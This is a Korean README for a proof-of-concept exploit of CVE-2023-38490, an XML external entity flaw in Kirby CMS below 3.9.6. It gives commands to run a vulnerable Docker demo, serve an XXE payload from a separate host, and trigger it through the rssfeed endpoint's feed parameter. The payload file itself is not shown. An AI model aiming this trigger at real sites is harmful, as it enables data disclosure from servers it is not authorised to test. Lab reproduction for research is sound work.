
Kirby < 3.9.6 XML 외부 엔터티 익스플로잇
Kirby < 3.9.6 XML 외부 엔티티
다음 취약점에 대한 익스플로잇: CVE-2023-38490 / GHSA-q386-w6fg-gmgp.
취약한 데모 앱 빌드 및 실행:
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
데모 페이로드 제공:
참고: 도커 컨테이너가 접근할 수 있는 바인드 주소를 선택하세요.
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
익스플로잇 트리거:
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
취약한 함수는 Kirby Core에 존재하지만 Kirby Core, Kirby StarterKit 또는 Kirby PlainKit에서 기본적으로 사용되지 않습니다. 즉, 기본 설정에서는 영향을 받지 않지만, 맞춤 개발이나 영향을 받는 툴킷을 사용하는 플러그인을 설치할 경우 취약점이 발생할 수 있습니다.
ACCEIS는 불법 활동을 조장하거나 장려하지 않으며, 이 저장소에서 제공되는 모든 콘텐츠는 연구, 교육 및 위협 탐지 목적으로만 제공됩니다.